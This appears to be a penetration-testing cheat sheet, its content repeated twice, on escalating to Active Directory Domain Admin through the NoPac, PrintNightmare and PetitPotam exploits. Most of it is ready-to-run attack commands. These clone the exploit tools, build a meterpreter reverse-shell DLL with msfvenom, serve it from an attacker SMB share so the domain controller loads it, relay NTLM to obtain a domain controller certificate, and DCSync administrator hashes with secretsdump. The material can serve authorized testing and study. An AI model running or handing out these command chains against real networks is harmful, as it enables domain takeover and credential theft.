Privilege Escalation to Domain Admin using Known Exploits

Last updated 1 year ago

Was this helpful?

NoPac

NoPac is an intra-domain privilege escalation exploit that allows escalating privileges from any standard user to domain admin level access
This exploit path takes advantage of being able to change the SamAccountName of a computer account to that of a Domain Controller.
The flow of the attack is outlined here:

Exploiting NoPac:

Get the NoPac exploit: git clone https://github.com/Ridter/noPac.git
Check if target is vulnerable: sudo python3 scanner.py domain.name/validuser:validpassword -dc-ip 172.16.5.5 -use-ldap
Get a SYSTEM shell as the built-in administrator: sudo python3 noPac.py DOMAIN.NAME/validuser:validpassword -dc-ip 172.16.5.5 -dc-host DC-NAME -shell --impersonate administrator -use-ldap
Perform DCSync against the built-in administrator: sudo python3 noPac.py DOMAIN.NAME/validuser:validpassword -dc-ip 172.16.5.5 -dc-host DC-NAME --impersonate administrator -use-ldap -dump -just-dc-user DOMAIN.NAME/administrator

Vulnerability found in the Print Spooler service that runs on all Windows operating systems that allows for privilege escalation and remote code execution.

Exploiting PrintNightmare:

Install cube0x0's version of impacket:

pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

Check if the Windows target has MS-PAR & MSRPRN exposed: rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'
Generate a DLL payload to be used by the exploit to gain a shell session: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=local-ip LPORT=anyport -f dll > backupscript.dll
Create an SMB server and host a shared folder (Data) at the location of the DLL payload that the exploit will attempt to download: sudo smbserver.py -smb2support Data /path/to/backupscript.dll
Run the exploit: sudo python3 CVE-2021-1675.py domain.name/validusername:validpassword@DC-IP '\\attacker-ip\CompData\backupscript.dll'

PetitPotam is an LSA spoofing vulnerability that allows forcing the domain controller to authenticate against another host using NTLM over port 445
This attack allows an unauthenticated user to take over the domain

Exploiting PetitPotam:

Get Petit Potam: git clone https://github.com/topotam/PetitPotam.git
Run Petit Potam. `python3 PetitPotam.py attacker-ip dc-ip
If it worked, you will find the base64 encoded certificate for the domain controller on the NTLM relay shell
Request a TGT for the domain controller using the certificate: python3 /PKINITtools/gettgtpkinit.py DOMAIN.NAME/DC-NAME\$ -pfx-base64 <base64 certificate> = dc01.ccache
Set the KRB5CCNAME environment variable to the previous output file: export KRB5CCNAME=dc01.ccache
Perform DCSync using (-k) the previous ccache file : secretsdump.py -just-dc-user DOMAIN.NAME/administrator -k -no-pass DC-NAME.DOMAIN.NAME

Last updated 1 year ago

Was this helpful?

NoPac is an intra-domain privilege escalation exploit that allows escalating privileges from any standard user to domain admin level access
This exploit path takes advantage of being able to change the SamAccountName of a computer account to that of a Domain Controller.
The flow of the attack is outlined here:

Exploiting NoPac:

Get the NoPac exploit: git clone https://github.com/Ridter/noPac.git
Check if target is vulnerable: sudo python3 scanner.py domain.name/validuser:validpassword -dc-ip 172.16.5.5 -use-ldap
Get a SYSTEM shell as the built-in administrator: sudo python3 noPac.py DOMAIN.NAME/validuser:validpassword -dc-ip 172.16.5.5 -dc-host DC-NAME -shell --impersonate administrator -use-ldap
Perform DCSync against the built-in administrator: sudo python3 noPac.py DOMAIN.NAME/validuser:validpassword -dc-ip 172.16.5.5 -dc-host DC-NAME --impersonate administrator -use-ldap -dump -just-dc-user DOMAIN.NAME/administrator

Vulnerability found in the Print Spooler service that runs on all Windows operating systems that allows for privilege escalation and remote code execution.

Exploiting PrintNightmare:

Install cube0x0's version of impacket:

pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

Check if the Windows target has MS-PAR & MSRPRN exposed: rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'
Generate a DLL payload to be used by the exploit to gain a shell session: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=local-ip LPORT=anyport -f dll > backupscript.dll
Create an SMB server and host a shared folder (Data) at the location of the DLL payload that the exploit will attempt to download: sudo smbserver.py -smb2support Data /path/to/backupscript.dll
Run the exploit: sudo python3 CVE-2021-1675.py domain.name/validusername:validpassword@DC-IP '\\attacker-ip\CompData\backupscript.dll'

PetitPotam is an LSA spoofing vulnerability that allows forcing the domain controller to authenticate against another host using NTLM over port 445
This attack allows an unauthenticated user to take over the domain
More information about PetitPotam can be found here:

Exploiting PetitPotam:

Start an NTLM relay: sudo ntlmrelayx.py -debug -smb2support --target http://DOMAIN/URL/to/Certificate/Authoirty/host --adcs --template DomainController Note: you can use to find the location of the CA
Get Petit Potam: git clone https://github.com/topotam/PetitPotam.git
Run Petit Potam. `python3 PetitPotam.py attacker-ip dc-ip
If it worked, you will find the base64 encoded certificate for the domain controller on the NTLM relay shell
Request a TGT for the domain controller using the certificate: python3 /PKINITtools/gettgtpkinit.py DOMAIN.NAME/DC-NAME\$ -pfx-base64 <base64 certificate> = dc01.ccache
Set the KRB5CCNAME environment variable to the previous output file: export KRB5CCNAME=dc01.ccache
Perform DCSync using (-k) the previous ccache file : secretsdump.py -just-dc-user DOMAIN.NAME/administrator -k -no-pass DC-NAME.DOMAIN.NAME